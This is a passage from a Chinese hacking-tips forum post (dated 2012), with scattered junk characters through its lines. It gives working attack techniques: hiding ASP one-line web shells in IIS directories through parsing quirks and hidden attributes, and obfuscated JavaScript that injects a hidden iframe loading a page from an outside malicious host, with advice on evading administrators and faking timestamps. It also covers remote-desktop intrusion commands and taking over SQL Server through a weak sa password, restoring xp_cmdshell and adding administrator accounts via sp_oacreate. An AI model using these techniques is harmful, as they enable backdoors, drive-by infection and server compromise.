执行后可以用AT命令查看新加的任务
( P6 ?/ Q- p/ `5 @; H d2 K6 `用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。( r; ^0 r& }5 ^7 J! T8 e
* P: r2 X5 F5 Q1 Y0 t7 Z& K53、隐藏ASP后门的两种方法( r6 e0 { x% a* T. l/ B0 ?0 K0 c
1、建立非标准目录:mkdir images..\6 r" T" G0 l& N0 w
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
5 L- S" X9 x, X) f: ~7 M% ^. L通过web访问ASP木马:http://ip/images../news.asp?action=login
9 I8 f. j6 E1 O$ l$ L& B如何删除非标准目录:rmdir images..\ /s
; s, r) d1 M& g- X p5 w2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:: _4 i) e* M# ?; Y' L) F! \
mkdir programme.asp9 W: m* a( {3 C# v4 |1 k5 s% }, e
新建1.txt文件内容:<!--#include file=”12.jpg”-->
, s! T# x; x8 S: k新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- Y. m+ ~; F! f: g2 zattrib +H +S programme.asp" F/ m0 z: Q) h0 }& X k' d# Q+ |1 C1 O
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, S0 c7 l7 c @$ \; |2 ]$ g, y9 y0 g, p& C0 V
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。& n! `3 Y6 M0 J4 v4 }9 M; D1 K" W' k
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。+ p' y9 O0 h" ^
. G6 v5 c% y% X9 U2 g- x; l
55、JS隐蔽挂马$ E' }- l4 t" g
1.* v+ P8 b) S$ }/ k1 N2 Z) E
var tr4c3="<iframe src=ht";
! I& z6 V5 Z R2 [tr4c3 = tr4c3+"tp:/";: v6 ~( y4 k( D X8 ?
tr4c3 = tr4c3+"/ww";& y3 K( ]2 j7 p, ?7 g/ P; k
tr4c3 = tr4c3+"w.tr4";2 ]; H9 V. Q% [2 `
tr4c3 = tr4c3+"c3.com/inc/m";" o B* h1 r% ?: z7 f& [7 i
tr4c3 = tr4c3+"m.htm style="display:none"></i";* g5 Q7 w) B0 d+ V; ?
tr4c3 =tr4c3+"frame>'";" s: I' |$ ~; I
document.write(tr4c3);- I( K5 A3 q T! ~" R' i
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。4 p" i* ~6 V2 ?9 L3 Q8 u
7 I$ w) J( t- w9 q9 b4 H0 a2.
) ^( t+ G j6 p+ G9 Y S2 k转换进制,然后用EVAL执行。如
* }6 @( m. }6 a# _3 t. k, i2 Geval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");+ s" V3 W( M+ r' B
不过这个有点显眼。
" W7 j' Q, W! |1 y3.1 m7 n) x- _) k9 X% P' X! K
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; v8 g/ n) }, o8 c2 b, v3 D& D最后一点,别忘了把文件的时间也修改下。
% O1 B* E5 k( V% I; }" ^- _( S
0 \# g4 q% a4 |2 _4 d56.3389终端入侵常用DOS命令5 c- P; B5 N& f$ n
taskkill taskkill /PID 1248 /t) y6 D# i% j" C6 k9 C9 n
: ^3 A+ p \8 ]# _ M# K
tasklist 查进程
6 d* L+ o/ Q* K. T2 h) |$ f9 i& q. z( l2 t
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限2 Q1 N4 H o4 d" O
iisreset /reboot
" N1 M" e) x- B% [: O" dtsshutdn /reboot /delay:1 重起服务器4 |% e$ {$ X6 X3 F% X5 o
0 E6 H6 O# i! J6 zlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,% f; e g& m: z9 N' N
4 d8 e. T0 Q$ t( r+ p
query user 查看当前终端用户在线情况, ]* t' ?$ ?8 }/ i7 [4 y* b) _
) q& v! \3 V1 d+ n& Q5 t要显示有关所有会话使用的进程的信息,请键入:query process *
6 S' W6 h7 C/ v' ~7 V; R2 A3 p3 K$ D$ [3 Q
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, t' K6 C2 a; J/ Y/ F1 i
8 w4 j. L% I5 T要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER22 X5 ^; E' Y! @; H' I: p
& ?: z# R2 `. V7 k/ ?要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' G5 x" q1 K8 A3 j4 W3 u
- }5 B: \0 q. z* S3 ]
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) R- h" `1 d& ?. h
! o& n- J# O q+ V! @命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. ~& E1 T# P: E: U1 t2 G0 |) o6 n3 p2 L5 s+ y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 D% ^: T. R1 T, \' W/ H1 R+ }& ^- e
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! Z) s: e" j. ]! k1 Z7 p
1 e! N; y Q5 X% y' g56、在地址栏或按Ctrl+O,输入:" A1 @: I: h' W9 u) l/ y
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;' S. _: F# r; k7 A
9 P2 l' s: K; \/ u! }( N6 n" E源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 ^! s( T- P) w4 F# u: E
8 d# G: E7 C# d: K8 p% o3 @- }57、net user的时候,是不能显示加$的用户,但是如果不处理的话,- I7 J8 y4 `3 ~% m2 N2 t J
用net localgroup administrators是可以看到管理组下,加了$的用户的。
& h7 w1 W, r: u3 ^& {! U
5 F4 n1 N3 S/ N% x: r58、 sa弱口令相关命令
) e# D* ^) B# {: ^$ p R/ t5 M% V
* Y% `* `; d6 G4 c一.更改sa口令方法:
4 c0 j" S) z# P9 X) P! B, h2 c用sql综合利用工具连接后,执行命令:. v/ u6 Z& R6 e1 f$ X/ |
exec sp_password NULL,'20001001','sa'
) [) F; g5 B* F* i, H! t(提示:慎用!): |3 z; u% v5 z3 s0 d. h8 Y
' f9 ~5 H/ W V* l4 Q2 X+ }5 I/ F
二.简单修补sa弱口令.
4 Y* \. R$ L2 ]6 H# B1 y9 F- ~
: b% ?* E! e% E; y0 i; }; R方法1:查询分离器连接后执行:
- P, H8 e+ l( u$ q, fif exists (select * from9 @$ j( B! M' ?: ?0 L
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- F5 V2 I+ n6 o" j/ m/ U: b
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)% i! O- `( f# v8 @ i/ C
2 v- G+ w" Z5 I; U" w
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
/ I7 D5 f. J' o5 W! W9 V) x
* S; }2 f- ~' m2 @GO
; r: T' m5 a4 y- a+ v6 D; k9 S$ U7 J. d& x
然后按F5键命令执行完毕. W1 B/ Q: s0 D3 V% A8 r! L
+ [, E# H* L) P' Y, R
方法2:查询分离器连接后9 T% S; p) _/ P: B! s/ t- Q! p
第一步执行:use master
! u; ^! U, H1 m2 A3 r$ L第二步执行:sp_dropextendedproc 'xp_cmdshell') k5 _% I: m5 r# L8 Q
然后按F5键命令执行完毕
0 \ t. [; \# \2 s6 U: s. z
0 k6 i8 h' x+ h6 v# Q. T7 _6 t
9 l# v: F+ ^2 E0 Z0 ~三.常见情况恢复执行xp_cmdshell.
- T7 X" {, C( G. \/ I
" U: I) R' d" g) c7 F( l. x
6 A9 z4 d3 X6 p, p( _4 P+ W9 e1 未能找到存储过程'master..xpcmdshell'.1 T2 i: Z; i L" `! Q9 W
恢复方法:查询分离器连接后,$ j+ C$ w/ ~. I
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 m, C/ \2 C$ K' c5 f0 l# u' R/ Z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# W4 h+ e e: w然后按F5键命令执行完毕
# e6 O) g8 y* q5 X& q+ L( s7 h
7 T# I2 h2 V1 t" Y2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 u7 `/ h" S1 \7 X5 f" p7 o% c恢复方法:查询分离器连接后,: K3 I; V6 u( p
第一步执行:sp_dropextendedproc "xp_cmdshell"
2 F: A. @7 C. w第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ _! Y$ B% N' [: K ?4 B) k
然后按F5键命令执行完毕
" s; y% J+ z# G7 e
, |. D* V* K+ d& s3 A3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。); c s8 n7 x! Z: S
恢复方法:查询分离器连接后,3 u+ a$ [; Q" [5 m" J$ r
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% l: S& U8 b) v4 z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 8 e: R1 N) n q' v3 J+ I( w6 e5 ~
然后按F5键命令执行完毕
/ e) l! x/ ^7 M; L ]. l( R" K- V M, ]# Q6 ~7 H3 e* ?6 K
四.终极方法.
1 T; p2 c) g9 J$ I& u如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! @ q+ P3 r( o: ^; z; B2 @查询分离器连接后,$ x0 l/ g5 a& I% E6 Z/ K3 V8 @
2000servser系统:
! |% c1 D- c1 z7 z* m+ Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
9 l, }2 z+ B2 r: r# v4 _ S0 T$ J( e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 i/ S: x2 ~$ E* `; D4 B
; N8 k. v& G6 e7 i% n5 a" A
xp或2003server系统:9 p9 g- W5 i- ^& x) o" n
w i% w5 V0 T; a$ t' W2 u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add': s5 P& h1 P2 B* b+ A6 H" \& w
! c' d$ k* R) O. k( zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 f( g( y# o% k
|
发表于 2012-9-15 14:51:03
收藏
支持
反对